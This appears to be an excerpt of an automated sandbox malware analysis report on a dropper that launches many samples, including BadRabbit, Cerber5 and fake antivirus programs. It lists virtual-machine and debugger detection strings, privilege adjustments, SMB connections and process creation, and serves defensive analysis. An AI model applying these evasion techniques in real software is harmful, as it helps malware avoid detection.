          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-3dvideo.resources_31bf3856ad364e35_10.0.17134.1_en-us_49c786157c795a73
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.17134.1_none_e6683e9b0956ac05
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.17134.1_none_d23c603739df2f637759d8\*_j2
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8o
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..nthfcvdev.resources_31bf3856ad364e35_10.0.17134.1_en-us_9c3432f847f5f8f0
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-tpm.resources_31bf3856ad364e35_10.0.17134.1_en-us_259560ef1632af7b
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.1_none_1ac11a9dc8f30e5b
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.694055083.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.694580301.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638786570.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639617349.0000000003A9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1_none_e636218254eba71f
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.17134.1_en-us_bdfc93ec7698eb64
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.17134.1_none_6447f639abdaab84b3e
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545
          Source: avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-Ve
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms.resources_31bf3856ad364e35_10.0.17134.1_en-us_2b9c39681a7206ff@_
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.17134.1_none_7338804b0eb50c17*_<
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmsp.resources_31bf3856ad364e35_10.0.17134.1_en-us_96681ed56ec765c6
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.17134.1_none_51d671baba10f2e8f_
          Source: avpc2009.exe, 00000019.00000003.606856071.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.641209672.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V`
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.17134.1_none_1c1693f7c8171ba6L
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261a^
          Source: avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.17134.1_en-us_aea0b368e53cc261~
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.17134.1_none_076f3325872ef096
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.1_none_f5d736b78ec0a239
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c
          Source: avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.17134.1_none_bd1bad59835abed8
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.647848064.0000000005C90000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.611929601.0000000005BBA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.604615391.0000000005C1C000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.649283893.0000000005C95000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.644614761.0000000005C81000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.692031576.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.643015243.0000000005C69000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698487124.0000000005C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144
          Source: avpc2009.exe, 00000019.00000003.603226938.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.697105730.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.589382276.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.689950909.0000000005B79000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.687092295.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.639678148.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.613926136.0000000005B93000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.606856071.0000000003B17000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.698345572.0000000005B88000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.590799442.0000000003A9A000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.641209672.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a2d8bf1fc7e924
          Source: C:\Windows\3F22.tmpProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,5_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,5_2_0040AE97
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00405BD2 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,8_2_00405BD2
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_0040AE70 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,8_2_0040AE70

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeOpen window title or class name: windbgframeclass
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,5_2_00411585
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040A1EC GetProcessHeap,RtlAllocateHeap,5_2_0040A1EC
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\3F22.tmpProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\4d44bed6.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\302746537.exeCode function: 7_2_00403CC0 SetUnhandledExceptionFilter,7_2_00403CC0
          Source: C:\Windows\302746537.exeCode function: 7_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,7_2_00403B70

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.107.5.88 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 139
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\4d44bed6.exe "C:\Users\user\Desktop\4d44bed6.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe "C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
